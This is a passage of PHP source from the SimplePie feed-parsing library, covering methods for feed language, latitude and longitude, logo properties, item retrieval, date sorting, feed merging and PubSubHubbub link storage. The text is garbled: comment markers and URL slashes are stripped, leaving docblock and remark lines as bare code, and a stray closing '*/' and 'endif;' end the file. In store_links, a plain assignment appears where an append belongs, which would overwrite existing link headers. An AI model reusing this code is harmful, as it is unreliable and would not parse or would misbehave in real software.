{
if ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'language'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_11, 'language'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_10, 'language'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif (isset($this->data['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['feed'][0]['xml_lang']))
{
return $this->sanitize($this->data['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['feed'][0]['xml_lang'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif (isset($this->data['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['feed'][0]['xml_lang']))
{
return $this->sanitize($this->data['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['feed'][0]['xml_lang'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif (isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['xml_lang']))
{
return $this->sanitize($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['xml_lang'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif (isset($this->data['headers']['content-language']))
{
return $this->sanitize($this->data['headers']['content-language'], SIMPLEPIE_CONSTRUCT_TEXT);
}
return null;
}
*
* Get the latitude coordinates for the item
*
* Compatible with the W3C WGS84 Basic Geo and GeoRSS specifications
*
* Uses `<geo:lat>` or `<georss:point>`
*
* @since 1.0
* @link http:www.w3.org/2003/01/geo/ W3C WGS84 Basic Geo
* @link http:www.georss.org/ GeoRSS
* @return string|null
public function get_latitude()
{
if ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_W3C_BASIC_GEO, 'lat'))
{
return (float) $return[0]['data'];
}
elseif (($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_GEORSS, 'point')) && preg_match('/^((?:-)?[0-9]+(?:\.[0-9]+)) ((?:-)?[0-9]+(?:\.[0-9]+))$/', trim($return[0]['data']), $match))
{
return (float) $match[1];
}
return null;
}
*
* Get the longitude coordinates for the feed
*
* Compatible with the W3C WGS84 Basic Geo and GeoRSS specifications
*
* Uses `<geo:long>`, `<geo:lon>` or `<georss:point>`
*
* @since 1.0
* @link http:www.w3.org/2003/01/geo/ W3C WGS84 Basic Geo
* @link http:www.georss.org/ GeoRSS
* @return string|null
public function get_longitude()
{
if ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_W3C_BASIC_GEO, 'long'))
{
return (float) $return[0]['data'];
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_W3C_BASIC_GEO, 'lon'))
{
return (float) $return[0]['data'];
}
elseif (($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_GEORSS, 'point')) && preg_match('/^((?:-)?[0-9]+(?:\.[0-9]+)) ((?:-)?[0-9]+(?:\.[0-9]+))$/', trim($return[0]['data']), $match))
{
return (float) $match[2];
}
return null;
}
*
* Get the feed logo's title
*
* RSS 0.9.0, 1.0 and 2.0 feeds are allowed to have a "feed logo" title.
*
* Uses `<image><title>` or `<image><dc:title>`
*
* @return string|null
public function get_image_title()
{
if ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_10, 'title'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_090, 'title'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'title'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_DC_11, 'title'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_DC_10, 'title'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
return null;
}
*
* Get the feed logo's URL
*
* RSS 0.9.0, 2.0, Atom 1.0, and feeds with iTunes RSS tags are allowed to
* have a "feed logo" URL. This points directly to the image itself.
*
* Uses `<itunes:image>`, `<atom:logo>`, `<atom:icon>`,
* `<image><title>` or `<image><dc:title>`
*
* @return string|null
public function get_image_url()
{
if ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ITUNES, 'image'))
{
return $this->sanitize($return[0]['attribs']['']['href'], SIMPLEPIE_CONSTRUCT_IRI);
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_10, 'logo'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_10, 'icon'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($return[0]));
}
elseif ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_10, 'url'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($return[0]));
}
elseif ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_090, 'url'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($return[0]));
}
elseif ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'url'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($return[0]));
}
return null;
}
*
* Get the feed logo's link
*
* RSS 0.9.0, 1.0 and 2.0 feeds are allowed to have a "feed logo" link. This
* points to a human-readable page that the image should link to.
*
* Uses `<itunes:image>`, `<atom:logo>`, `<atom:icon>`,
* `<image><title>` or `<image><dc:title>`
*
* @return string|null
public function get_image_link()
{
if ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_10, 'link'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($return[0]));
}
elseif ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_090, 'link'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($return[0]));
}
elseif ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'link'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($return[0]));
}
return null;
}
*
* Get the feed logo's link
*
* RSS 2.0 feeds are allowed to have a "feed logo" width.
*
* Uses `<image><width>` or defaults to 88.0 if no width is specified and
* the feed is an RSS 2.0 feed.
*
* @return int|float|null
public function get_image_width()
{
if ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'width'))
{
return round($return[0]['data']);
}
elseif ($this->get_type() & SIMPLEPIE_TYPE_RSS_SYNDICATION && $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'url'))
{
return 88.0;
}
return null;
}
*
* Get the feed logo's height
*
* RSS 2.0 feeds are allowed to have a "feed logo" height.
*
* Uses `<image><height>` or defaults to 31.0 if no height is specified and
* the feed is an RSS 2.0 feed.
*
* @return int|float|null
public function get_image_height()
{
if ($return = $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'height'))
{
return round($return[0]['data']);
}
elseif ($this->get_type() & SIMPLEPIE_TYPE_RSS_SYNDICATION && $this->get_image_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'url'))
{
return 31.0;
}
return null;
}
*
* Get the number of items in the feed
*
* This is well-suited for {@link http:php.net/for for()} loops with
* {@see get_item()}
*
* @param int $max Maximum value to return. 0 for no limit
* @return int Number of items in the feed
public function get_item_quantity($max = 0)
{
$max = (int) $max;
$qty = count($this->get_items());
if ($max === 0)
{
return $qty;
}
return ($qty > $max) ? $max : $qty;
}
*
* Get a single item from the feed
*
* This is better suited for {@link http:php.net/for for()} loops, whereas
* {@see get_items()} is better suited for
* {@link http:php.net/foreach foreach()} loops.
*
* @see get_item_quantity()
* @since Beta 2
* @param int $key The item that you want to return. Remember that arrays begin with 0, not 1
* @return SimplePie_Item|null
public function get_item($key = 0)
{
$items = $this->get_items();
if (isset($items[$key]))
{
return $items[$key];
}
return null;
}
*
* Get all items from the feed
*
* This is better suited for {@link http:php.net/for for()} loops, whereas
* {@see get_items()} is better suited for
* {@link http:php.net/foreach foreach()} loops.
*
* @see get_item_quantity
* @since Beta 2
* @param int $start Index to start at
* @param int $end Number of items to return. 0 for all items after `$start`
* @return SimplePie_Item[]|null List of {@see SimplePie_Item} objects
public function get_items($start = 0, $end = 0)
{
if (!isset($this->data['items']))
{
if (!empty($this->multifeed_objects))
{
$this->data['items'] = SimplePie::merge_items($this->multifeed_objects, $start, $end, $this->item_limit);
if (empty($this->data['items']))
{
return array();
}
return $this->data['items'];
}
$this->data['items'] = array();
if ($items = $this->get_feed_tags(SIMPLEPIE_NAMESPACE_ATOM_10, 'entry'))
{
$keys = array_keys($items);
foreach ($keys as $key)
{
$this->data['items'][] = $this->registry->create('Item', array($this, $items[$key]));
}
}
if ($items = $this->get_feed_tags(SIMPLEPIE_NAMESPACE_ATOM_03, 'entry'))
{
$keys = array_keys($items);
foreach ($keys as $key)
{
$this->data['items'][] = $this->registry->create('Item', array($this, $items[$key]));
}
}
if ($items = $this->get_feed_tags(SIMPLEPIE_NAMESPACE_RSS_10, 'item'))
{
$keys = array_keys($items);
foreach ($keys as $key)
{
$this->data['items'][] = $this->registry->create('Item', array($this, $items[$key]));
}
}
if ($items = $this->get_feed_tags(SIMPLEPIE_NAMESPACE_RSS_090, 'item'))
{
$keys = array_keys($items);
foreach ($keys as $key)
{
$this->data['items'][] = $this->registry->create('Item', array($this, $items[$key]));
}
}
if ($items = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'item'))
{
$keys = array_keys($items);
foreach ($keys as $key)
{
$this->data['items'][] = $this->registry->create('Item', array($this, $items[$key]));
}
}
}
if (empty($this->data['items']))
{
return array();
}
if ($this->order_by_date)
{
if (!isset($this->data['ordered_items']))
{
$this->data['ordered_items'] = $this->data['items'];
usort($this->data['ordered_items'], array(get_class($this), 'sort_items'));
}
$items = $this->data['ordered_items'];
}
else
{
$items = $this->data['items'];
}
Slice the data as desired
if ($end === 0)
{
return array_slice($items, $start);
}
return array_slice($items, $start, $end);
}
*
* Set the favicon handler
*
* @deprecated Use your own favicon handling instead
public function set_favicon_handler($page = false, $qs = 'i')
{
$level = defined('E_USER_DEPRECATED') ? E_USER_DEPRECATED : E_USER_WARNING;
trigger_error('Favicon handling has been removed, please use your own handling', $level);
return false;
}
*
* Get the favicon for the current feed
*
* @deprecated Use your own favicon handling instead
public function get_favicon()
{
$level = defined('E_USER_DEPRECATED') ? E_USER_DEPRECATED : E_USER_WARNING;
trigger_error('Favicon handling has been removed, please use your own handling', $level);
if (($url = $this->get_link()) !== null)
{
return 'https:www.google.com/s2/favicons?domain=' . urlencode($url);
}
return false;
}
*
* Magic method handler
*
* @param string $method Method name
* @param array $args Arguments to the method
* @return mixed
public function __call($method, $args)
{
if (strpos($method, 'subscribe_') === 0)
{
$level = defined('E_USER_DEPRECATED') ? E_USER_DEPRECATED : E_USER_WARNING;
trigger_error('subscribe_*() has been deprecated, implement the callback yourself', $level);
return '';
}
if ($method === 'enable_xml_dump')
{
$level = defined('E_USER_DEPRECATED') ? E_USER_DEPRECATED : E_USER_WARNING;
trigger_error('enable_xml_dump() has been deprecated, use get_raw_data() instead', $level);
return false;
}
$class = get_class($this);
$trace = debug_backtrace(); phpcs:ignore PHPCompatibility.FunctionUse.ArgumentFunctionsReportCurrentValue.NeedsInspection
$file = $trace[0]['file'];
$line = $trace[0]['line'];
trigger_error("Call to undefined method $class::$method() in $file on line $line", E_USER_ERROR);
}
*
* Sorting callback for items
*
* @access private
* @param SimplePie $a
* @param SimplePie $b
* @return boolean
public static function sort_items($a, $b)
{
$a_date = $a->get_date('U');
$b_date = $b->get_date('U');
if ($a_date && $b_date) {
return $a_date > $b_date ? -1 : 1;
}
Sort items without dates to the top.
if ($a_date) {
return 1;
}
if ($b_date) {
return -1;
}
return 0;
}
*
* Merge items from several feeds into one
*
* If you're merging multiple feeds together, they need to all have dates
* for the items or else SimplePie will refuse to sort them.
*
* @link http:simplepie.org/wiki/tutorial/sort_multiple_feeds_by_time_and_date#if_feeds_require_separate_per-feed_settings
* @param array $urls List of SimplePie feed objects to merge
* @param int $start Starting item
* @param int $end Number of items to return
* @param int $limit Maximum number of items per feed
* @return array
public static function merge_items($urls, $start = 0, $end = 0, $limit = 0)
{
if (is_array($urls) && sizeof($urls) > 0)
{
$items = array();
foreach ($urls as $arg)
{
if ($arg instanceof SimplePie)
{
$items = array_merge($items, $arg->get_items(0, $limit));
}
else
{
trigger_error('Arguments must be SimplePie objects', E_USER_WARNING);
}
}
usort($items, array(get_class($urls[0]), 'sort_items'));
if ($end === 0)
{
return array_slice($items, $start);
}
return array_slice($items, $start, $end);
}
trigger_error('Cannot merge zero SimplePie objects', E_USER_WARNING);
return array();
}
*
* Store PubSubHubbub links as headers
*
* There is no way to find PuSH links in the body of a microformats feed,
* so they are added to the headers when found, to be used later by get_links.
* @param SimplePie_File $file
* @param string $hub
* @param string $self
private function store_links(&$file, $hub, $self) {
if (isset($file->headers['link']['hub']) ||
(isset($file->headers['link']) &&
preg_match('/rel=hub/', $file->headers['link'])))
{
return;
}
if ($hub)
{
if (isset($file->headers['link']))
{
if ($file->headers['link'] !== '')
{
$file->headers['link'] = ', ';
}
}
else
{
$file->headers['link'] = '';
}
$file->headers['link'] .= '<'.$hub.'>; rel=hub';
if ($self)
{
$file->headers['link'] .= ', <'.$self.'>; rel=self';
}
}
}
}
endif;
*/